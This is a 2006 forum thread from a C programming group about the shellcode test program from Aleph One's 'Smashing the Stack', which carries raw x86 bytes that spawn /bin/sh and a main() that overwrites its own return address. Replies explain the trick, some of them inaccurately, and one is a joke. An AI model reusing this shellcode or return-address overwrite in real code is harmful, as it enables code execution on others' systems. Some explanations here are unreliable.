How this code works n

Discussion in 'C Programming' started by sgurminder@gmail.com, May 18, 2006.

  1. Guest

    Can anyone explain how this shell spawning code works......
    I am not able to figure out exactly..... I got this from Aleph1's
    Smashing the stack file. :)

    Here it is
    ==================================================================



    testsc.c
    ------------------------------------------------------------------------------
    char shellcode[] =

    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"

    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"

    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

    void main() {
    int *ret;

    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;

    }
    , May 18, 2006
    #1
    1. Advertising

  2. Vladimir Oka Guest

    wrote:
    > Can anyone explain how this shell spawning code works......


    Not really, as it invokes Undefined Behaviour at the very start.

    Also, why? It's abominable.

    > I am not able to figure out exactly..... I got this from Aleph1's
    > Smashing the stack file. :)
    >
    > Here it is
    > ==================================================================
    >
    >
    >
    > testsc.c
    > ------------------------------------------------------------------------------
    > char shellcode[] =
    >
    > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    >
    > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    >
    > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
    >
    > void main() {


    Undefined Behaviour. BANG!

    > int *ret;
    >
    > ret = (int *)&ret + 2;
    > (*ret) = (int)shellcode;
    >
    > }
    Vladimir Oka, May 18, 2006
    #2
    1. Advertising

  3. wrote:
    > Can anyone explain how this shell spawning code works......
    > I am not able to figure out exactly..... I got this from Aleph1's
    > Smashing the stack file. :)
    >

    As you will no doubt be told by many, this is pretty much off-topic
    here. Follow-ups set.

    > Here it is
    > ==================================================================
    > testsc.c
    > ------------------------------------------------------------------------------
    > char shellcode[] =
    >
    > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    >
    > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    >
    > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
    >

    This creates an array of bytes that I presume is intended to represent
    executable code of some nature. This is, no doubt, highly platform and
    architecture dependant. Some of the bytes are no-ops to position the
    rest of the bytes just so. Others probably represent unconditional
    jumps to some other place.

    > void main() {

    If you are trying to black-hat hack, I guess no one cares if you aren't
    ISO standard. Check the prototype for main() to be sure.

    > int *ret;

    Declares an int. The address of this int will be in process memory.
    Smart hackers have a pretty good idea where this memory is in relation
    to other process memory, like the data and text segments (on
    architectures where this nomenclature makes sense).

    >
    > ret = (int *)&ret + 2;

    This assumes an int is 2 bytes, I guess. This makes the int pointer ret
    point to 2 bytes passed what has been allocated for ret in the first
    place. Typically, auto variables like this are maintained on the stack,
    and adding to this location often yields a smaller address. At any rate
    the hope is ret has been incremented past what the runtime code has
    allocated for a single int and into the part of the process memory that
    holds executable code.

    > (*ret) = (int)shellcode;

    This stores the bytes (encoded as hex bytes, above) into the new
    location which we hope is beyond the end of the stack. A part of the
    data runs into process memory that can run code. Often the intent is to
    simply have it invoke the equivalent of the exec() library call. This
    allows one to exec() any sort of thing they would like over the current
    process, like a shell.

    >
    > }
    >


    I'm no hacker, so the preceding was my poor understanding of classic
    stack smashing. Hence my violent hand-waving.

    I'll float the idea that this is *somewhat* on-topic given that on most
    platforms C is the language of choice because, well, you are allowed to
    do stuff like walk off the end of a pointer (this is not a criticism,
    but merely an observation). Plus, I find it sort of interesting,
    especially in light of how some platforms have countered this naive (but
    so useful) way of leveraging process memory.

    As you can see, much of this depends on highly non-portable assumptions
    and specific platform, architecture and compiler knowledge. This is why
    "rootkits" tend to be so customized for specific targets.
    Clever Monkey, May 18, 2006
    #3
  4. wrote:
    > Can anyone explain how this shell spawning code works......
    > I am not able to figure out exactly..... I got this from Aleph1's
    > Smashing the stack file. :)
    >
    > Here it is
    > ==================================================================
    >
    >
    >
    > testsc.c
    > ------------------------------------------------------------------------------
    > char shellcode[] =
    >
    > "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    >
    > "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    >
    > "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    > "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
    >
    > void main() {
    > int *ret;

    creates a pointer to an int on stack
    >
    > ret = (int *)&ret + 2;

    takes the address of the ret local variable casts this as a int pointer
    and performs pointer arithmetic. maybe assuming that an address is the
    same size as an int this steps over the old frame pointer currently just
    above the local variable on the stack and holds the address of the
    instruction to return to after function completion
    > (*ret) = (int)shellcode;

    writes over the real return instruction address(pointed to by ret) to
    return after function completion and instead writes the address of
    shellcode so the function returns and starts executing using the
    shellcode array defined above.
    >
    > }
    >


    Highly machine dependent and what I'm saying is speculation. The code
    comments I've written above pertain to the x86 architecture with a
    particular caller/callee save convention with a name that escapes me at
    the moment, sorry. The shellcode written would possibly only work on one
    particular type of processor. Slightly off topic but an interesting
    question.
    Steven Tarence Dalton, May 18, 2006
    #4
  5. On Thu, 18 May 2006 09:37:04 UTC, wrote:

    > Can anyone explain how this shell spawning code works......
    > I am not able to figure out exactly..... I got this from Aleph1's
    > Smashing the stack file. :)


    It will speed up your CPU in the factor of 1 million and thereafter
    format your hard disk to hold 100,000 times the number of bytes and
    then install the most current Windows 2006 directly from Microsoft -
    but only if you owns the hacked version of Windows XP SP3 installed
    already. TIn any case it will read your outlook address book and email
    the program to each fried, your colleauges and your boss to get them
    Windows 2006 installed too.



    --
    Tschau/Bye
    Herbert

    Visit http://www.ecomstation.de the home of german eComStation
    eComStation 1.2 Deutsch ist da!
    Herbert Rosenau, May 19, 2006
    #5
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. dbuchanan
    Replies:
    9
    Views:
    4,136
    Jim Wooley
    Feb 8, 2006
  2. Johann Blake
    Replies:
    1
    Views:
    1,183
    Hermit Dave
    Jan 5, 2004
  3. F. GEIGER
    Replies:
    3
    Views:
    752
    F. GEIGER
    Aug 6, 2004
  4. Alexander Burger

    getMethod() works and works not

    Alexander Burger, Nov 27, 2010, in forum: Java
    Replies:
    25
    Views:
    1,718
    Alexander Burger
    Nov 29, 2010
  5. abargaddon
    Replies:
    1
    Views:
    185
    clintmazur
    Feb 4, 2008
Loading...

Share This Page